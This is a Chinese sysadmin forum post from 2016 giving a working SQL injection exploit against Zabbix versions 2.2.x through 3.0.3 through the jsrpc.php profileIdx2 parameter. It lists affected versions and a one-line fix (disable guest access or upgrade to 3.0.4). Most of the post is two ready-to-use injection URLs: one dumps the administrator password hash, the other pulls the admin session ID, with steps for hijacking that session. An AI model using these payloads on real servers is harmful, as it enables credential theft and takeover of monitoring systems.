设为首页 收藏本站
查看: 1111|回复: 0

[经验分享] Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

[复制链接]
累计签到:1 天
连续签到:1 天
发表于 2016-8-19 08:59:43 | 显示全部楼层 |阅读模式
攻击成本:低
危害程度:高

利用条件: 需要guest用户权限(未登录用户都被设定为guest用户的访问权限)
影响范围:2.2.x / 2.4.x/ 3.0.0-3.0.3

修复建议: 禁用guest用户或者升级到3.0.4
漏洞利用:
   爆密码
   sanr.com/zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and updatexml(1,concat(0x3a,(select passwd from zabbix.users limit 0,1)),1))%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
输出结果,如下表示漏洞存在:
   wKioL1e1SNjBxxvtAAC8nFNlxd0879.jpg
输出结果,如下表示禁用guest:
wKioL1e1Sfvy-9pCAADd3By_ozw823.jpg
爆sessionid(在密码破解不了情况下 可以使用session欺骗)
   需要取掉爆出来sessionid前面的数字1,在进行修改zbx_sessionid的值。
   sanr.com/zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(sessionid,0x7e,userid,0x7e,status) from sessions where status=0 and userid=1 LIMIT 0,1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

wKiom1e1VtqSy3yeAAEJ5vmTyq8452.jpg

wKiom1e1Vtvxe6tJAAICI3mnauM375.jpg
wKioL1e1VtriLSbhAAHGirrU650177.jpg
zabbix具体版号查看

2.x版本

wKiom1e1SoOAv1G5AAGHJp2doBU152.jpg
wKioL1e1SoSxHHMkAAFg-OrySWk538.jpg
  3.x版本
wKiom1e1Ss2Co2-zAAAwVTl-FVg769.jpg
wKioL1e1St6BfmD_AABfDCp9jEY513.jpg
   


运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-259797-1-1.html 上篇帖子: Zabbix 2.2 < 3.0.3 - RCE with API JSON-RPC 下篇帖子: Zabbix建立自定义key值
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表